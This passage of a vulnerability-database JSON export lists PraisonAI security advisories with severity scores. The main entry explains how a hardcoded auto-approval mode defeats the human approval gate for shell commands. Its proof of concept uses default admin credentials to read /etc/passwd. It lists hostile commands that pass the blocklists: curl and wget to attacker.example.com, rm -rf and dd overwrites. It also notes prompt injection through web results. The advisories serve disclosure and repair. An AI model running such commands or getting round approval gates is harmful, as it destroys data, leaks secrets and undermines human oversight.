H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:47:18Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/commit/47bff65413beaa3c21bf633c1fae4e684348368c"},{"reference_url":"https://github.com/advisories/GHSA-9qhq-v63v-fv3j","reference_id":"GHSA-9qhq-v63v-fv3j","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9qhq-v63v-fv3j"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9qhq-v63v-fv3j","reference_id":"GHSA-9qhq-v63v-fv3j","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:47:18Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9qhq-v63v-fv3j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373874?format=json","purl":"pkg:pypi/praisonai@4.5.149","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-t4qq-sgqa-ubet"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.149"}],"aliases":["CVE-2026-41497","GHSA-9qhq-v63v-fv3j"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fnbr-df5j-hkay"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/67772?format=json","vulnerability_id":"VCID-gnv9-my7f-e7dc","summary":"PraisonAI is a multi-agent teams system. Prior to praisonai version 4.6.37 and praisonaiagents version 1.6.37, praisonaiagents resolves unresolved tool names against module globals and __main__ after it fails to match the declared tool list and the registry. With the default agent configuration, _perm_allow is None, so undeclared non-dangerous tool names are not rejected by the permission gate. An attacker who can influence tool-call names can therefore invoke unintended application callables that were never declared as tools. This issue has been patched in praisonai version 4.6.37 and praisonaiagents version 1.6.37.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44339","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12817","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12732","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12835","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12826","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44339"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44339","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44339"},{"reference_url":"https://github.com/advisories/GHSA-gmjg-hv98-qggq","reference_id":"GHSA-gmjg-hv98-qggq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gmjg-hv98-qggq"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-gmjg-hv98-qggq","reference_id":"GHSA-gmjg-hv98-qggq","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-08T17:03:56Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-gmjg-hv98-qggq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/375720?format=json","purl":"pkg:pypi/praisonai@4.6.37","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.6.37"}],"aliases":["CVE-2026-44339","GHSA-gmjg-hv98-qggq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gnv9-my7f-e7dc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84079?format=json","vulnerability_id":"VCID-h4nz-hgqj-hbfp","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI’s MCP (Model Context Protocol) integration allows spawning background servers via stdio using user-supplied command strings (e.g., MCP(\"npx -y @smithery/cli ...\")). These commands are executed through Python’s subprocess module. By default, the implementation forwards the entire parent process environment to the spawned subprocess. As a result, any MCP command executed in this manner inherits all environment variables from the host process, including sensitive data such as API keys, authentication tokens, and database credentials. This behavior introduces a security risk when untrusted or third-party commands are used. In common scenarios where MCP tools are invoked via package runners such as npx -y, arbitrary code from external or potentially compromised packages may execute with access to these inherited environment variables. This creates a risk of unintended credential exposure and enables potential supply chain attacks through silent exfiltration of secrets. This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40159","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05171","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05154","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05162","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40159"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40159","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40159"},{"reference_url":"https://github.com/advisories/GHSA-pj2r-f9mw-vrcq","reference_id":"GHSA-pj2r-f9mw-vrcq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pj2r-f9mw-vrcq"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pj2r-f9mw-vrcq","reference_id":"GHSA-pj2r-f9mw-vrcq","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-15T14:48:28Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pj2r-f9mw-vrcq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40159","GHSA-pj2r-f9mw-vrcq"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h4nz-hgqj-hbfp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84081?format=json","vulnerability_id":"VCID-hn77-cd7k-vyaq","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the WSGI-based recipe registry server (server.py) reads the entire HTTP request body into memory based on the client-supplied Content-Length header with no upper bound. Combined with authentication being disabled by default (no token configured), any local process can send arbitrarily large POST requests to exhaust server memory and cause a denial of service. The Starlette-based server (serve.py) has RequestSizeLimitMiddleware with a 10MB limit, but the WSGI server lacks any equivalent protection. This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40115","reference_id":"","reference_type":"","scores":[{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.23128","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.23118","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22932","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.23139","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40115"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40115","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40115"},{"reference_url":"https://github.com/advisories/GHSA-2xgv-5cv2-47vv","reference_id":"GHSA-2xgv-5cv2-47vv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2xgv-5cv2-47vv"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2xgv-5cv2-47vv","reference_id":"GHSA-2xgv-5cv2-47vv","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T15:28:36Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2xgv-5cv2-47vv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40115","GHSA-2xgv-5cv2-47vv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hn77-cd7k-vyaq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84337?format=json","vulnerability_id":"VCID-jv6j-m48q-h7ca","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the AgentOS deployment platform exposes a GET /api/agents endpoint that returns agent names, roles, and the first 100 characters of agent system instructions to any unauthenticated caller. The AgentOS FastAPI application has no authentication middleware, no API key validation, and defaults to CORS allow_origins=[\"*\"] with host=\"0.0.0.0\", making every deployment network-accessible and queryable from any origin by default. This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40151","reference_id":"","reference_type":"","scores":[{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.18881","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00859","scoring_system":"epss","scoring_elements":"0.7552","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00859","scoring_system":"epss","scoring_elements":"0.75529","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00859","scoring_system":"epss","scoring_elements":"0.75534","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40151"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40151","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40151"},{"reference_url":"https://github.com/advisories/GHSA-pm96-6xpr-978x","reference_id":"GHSA-pm96-6xpr-978x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pm96-6xpr-978x"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pm96-6xpr-978x","reference_id":"GHSA-pm96-6xpr-978x","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:10:14Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pm96-6xpr-978x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40151","GHSA-pm96-6xpr-978x"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jv6j-m48q-h7ca"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359780?format=json","vulnerability_id":"VCID-nkf5-e94x-sudc","summary":"PraisonAI: Hardcoded `approval_mode=\"auto\"` in Chainlit UI Overrides Administrator Configuration, Enabling Unapproved Shell Command Execution\n## Summary\n\nThe Chainlit UI modules (`chat.py` and `code.py`) hardcode `config.approval_mode = \"auto\"` after loading administrator configuration from the `PRAISON_APPROVAL_MODE` environment variable, silently overriding any \"manual\" or \"scoped\" approval setting. This defeats the human-in-the-loop approval gate for all ACP tool executions, including shell command execution via `subprocess.run(..., shell=True)`. An authenticated user can instruct the LLM agent to execute arbitrary single-command shell operations on the server without any approval prompt.\n\n## Details\n\nThe application has a well-designed approval framework supporting `auto`, `manual`, and `scoped` modes, configured via the `PRAISON_APPROVAL_MODE` environment variable and loaded by `ToolConfig.from_env()` at `interactive_tools.py:81-106`.\n\nHowever, both UI modules unconditionally override this after loading:\n\n**`chat.py:156-159`:**\n```python\nconfig = ToolConfig.from_env()       # reads PRAISON_APPROVAL_MODE=manual\nconfig.workspace = os.getcwd()\nconfig.approval_mode = \"auto\"        # hardcoded override, ignoring admin config\n```\n\n**`code.py:155-158`:**\n```python\nconfig = ToolConfig.from_env()\nconfig.workspace = os.environ.get(\"PRAISONAI_CODE_REPO_PATH\", os.getcwd())\nconfig.approval_mode = \"auto\"        # same hardcoded override\n```\n\nThis flows to `agent_tools.py:347-348` in the `acp_execute_command` function:\n```python\nauto_approve = runtime.config.approval_mode == \"auto\"   # always True\napproved = await orchestrator.approve_plan(plan, auto=auto_approve)\n```\n\nThe plan is auto-approved without user confirmation and reaches `action_orchestrator.py:458`:\n```python\nresult = subprocess.run(\n    step.target,\n    shell=True,           # shell execution\n    capture_output=True,\n    text=True,\n    cwd=str(workspace),\n    timeout=30\n)\n```\n\n**Command sanitization is insufficient.** Two blocklists exist:\n1. `_sanitize_command()` at `agent_tools.py:60-86` blocks: `$(`, `` ` ``, `&&`, `||`, `>>`, `>`, `|`, `;`, `&`, `\\n`, `\\r`\n2. `_apply_step()` at `action_orchestrator.py:449` blocks: `;`, `&`, `|`, `$`, `` ` ``\n\nBoth only target command chaining/substitution operators. Single-argument destructive commands pass both blocklists: `rm -rf /home`, `curl http://attacker.example.com/exfil`, `wget`, `chmod 777 /etc/shadow`, `python3 -c \"import os; os.unlink('/important')\"`, `dd if=/dev/zero of=/dev/sda`.\n\n## PoC\n\n**Prerequisites:** PraisonAI UI running (`praisonai ui chat` or `praisonai ui code`). Default credentials not changed.\n\n```bash\n# Step 1: Start the Chainlit UI\npraisonai ui chat\n\n# Step 2: Log in with default credentials at http://localhost:8000\n# Username: admin\n# Password: admin\n\n# Step 3: Send a chat message requesting command execution:\n# \"Please run this command for me: cat /etc/passwd\"\n\n# The LLM agent calls acp_execute_command(\"cat /etc/passwd\")\n# _sanitize_command passes (no blocked patterns)\n# approval_mode=\"auto\" → auto-approved at agent_tools.py:347-348\n# subprocess.run(\"cat /etc/passwd\", shell=True) executes at action_orchestrator.py:458\n# Contents of /etc/passwd returned in chat\n\n# Step 4: Demonstrate the override of admin configuration:\n# Even with PRAISON_APPROVAL_MODE=manual set in the environment,\n# chat.py:159 overwrites it to \"auto\"\nexport PRAISON_APPROVAL_MODE=manual\npraisonai ui chat\n# Commands still auto-approve because of the hardcoded override\n```\n\n**Commands that bypass sanitization blocklists:**\n- `rm -rf /home/user/documents` — no blocked characters\n- `chmod 777 /etc/shadow` — no blocked characters  \n- `curl http://attacker.example.com/exfil` — no blocked characters\n- `wget http://attacker.example.com/backdoor -O /tmp/backdoor` — no blocked characters\n- `python3 -c \"__import__('os').unlink('/important/file')\"` — no blocked characters\n\n## Impact\n\n- **Arbitrary command execution:** An authenticated user (or attacker with default `admin/admin` credentials) can execute any single shell command on the server hosting PraisonAI, subject only to the OS-level permissions of the PraisonAI process.\n- **Confidentiality breach:** Read arbitrary files accessible to the process (`/etc/passwd`, application secrets, environment variables containing API keys).\n- **Integrity compromise:** Modify or delete files, install backdoors, tamper with application code.\n- **Availability impact:** Kill processes, consume disk/memory, delete critical data.\n- **Administrator control undermined:** Even administrators who explicitly set `PRAISON_APPROVAL_MODE=manual` to require human approval have their configuration silently overridden, creating a false sense of security.\n- **Prompt injection vector:** Since the agent also processes external content (web search results via Tavily, uploaded files), malicious content could trigger command execution through the auto-approved tool without direct user intent.\n\n## Recommended Fix\n\nRemove the hardcoded override and respect the administrator's configured approval mode. In both `chat.py` and `code.py`:\n\n```python\n# Before (chat.py:156-159):\nconfig = ToolConfig.from_env()\nconfig.workspace = os.getcwd()\nconfig.approval_mode = \"auto\"  # Trust mode - auto-approve all tool executions\n\n# After:\nconfig = ToolConfig.from_env()\nconfig.workspace = os.getcwd()\n# Respect PRAISON_APPROVAL_MODE from environment; defaults to \"auto\" in ToolConfig\n# Administrators can set PRAISON_APPROVAL_MODE=manual for human-in-the-loop approval\n```\n\nAdditionally, strengthen `_sanitize_command()` to use an allowlist approach rather than a blocklist:\n\n```python\nimport shlex\n\nALLOWED_COMMANDS = {\"ls\", \"cat\", \"head\", \"tail\", \"grep\", \"find\", \"echo\", \"pwd\", \"wc\", \"sort\", \"uniq\", \"diff\", \"git\", \"python\", \"pip\", \"node\", \"npm\"}\n\ndef _sanitize_command(command: str) -> str:\n    # Existing blocklist checks...\n    \n    # Additionally, check the base command against allowlist\n    try:\n        parts = shlex.split(command)\n    except ValueError:\n        raise ValueError(f\"Could not parse command: {command!r}\")\n    \n    base_cmd = os.path.basename(parts[0]) if parts else \"\"\n    if base_cmd not in ALLOWED_COMMANDS:\n        raise ValueError(\n            f\"Command {base_cmd!r} is not in the allowed command list. \"\n            f\"Allowed: {', '.join(sorted(ALLOWED_COMMANDS))}\"\n        )\n    \n    return command\n```","references":[{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qwgj-rrpj-75xm","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qwgj-rrpj-75xm"},{"reference_url":"https://github.com/advisories/GHSA-qwgj-rrpj-75xm","reference_id":"GHSA-qwgj-rrpj-75xm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qwgj-rrpj-75xm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["GHSA-qwgj-rrpj-75xm"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nkf5-e94x-sudc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84045?format=json","vulnerability_id":"VCID-npjp-51an-5qc6","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, deploy.py constructs a single comma-delimited string for the gcloud run\ndeploy --set-env-vars argument by directly interpolating openai_model, openai_key, and openai_base without validating that these values do not contain commas. gcloud uses a comma as the key-value pair separator for --set-env-vars. A comma in any of the three values causes gcloud to parse the trailing text as additional KEY=VALUE definitions, injecting arbitrary environment variables into the deployed Cloud Run service. This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40113","reference_id":"","reference_type":"","scores":[{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10729","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10699","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.1067","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.1073","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40113"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40113","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40113"},{"reference_url":"https://github.com/advisories/GHSA-fvxx-ggmx-3cjg","reference_id":"GHSA-fvxx-ggmx-3cjg","reference_type":"","scores"